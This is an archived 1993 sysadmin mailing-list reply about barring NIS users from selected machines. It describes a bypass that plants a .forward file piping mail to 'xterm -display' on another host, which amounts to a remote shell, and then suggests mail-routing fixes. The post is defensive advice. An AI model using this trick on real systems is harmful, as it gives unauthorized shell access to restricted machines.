Re: Summary of How to disallow selected users access to selected machines

From: Rob Quinn (
Date: Fri Apr 16 1993 - 10:41:51 CDT

In <> (Alexander Bachmann) writes:
>We don't remove remove the NIS passwd entries for users with -user
>(or -@netgroup) because this will cause trouble with email, when a
>user is not known on the mail-server.

 I have successfully broken into (my own) machines this way. Create a .forward
with something like '|xterm -display machine_I_can_use:0' in it and then send
yourself some mail. With NFS disks, it's easy to create .forwards on other
 If you do go with the '-@netgroup' option, make sure local mail sent out has
full hostnames so that when a user on a restricted machine replies to mail from
a restricted user it won't be a local delivery to the restricted machine. Or
use a central mailhost/MX stuff and deliver all mail on one machine only.
(Did that make sense?)

| "Those who suppress freedom always                             Rob Quinn |
| do so in the name of law                       |
| and order." --John Lindsay                         QuinnBob@KSUVM.BITNET |

This archive was generated by hypermail 2.1.2 : Fri Sep 28 2001 - 23:07:45 CDT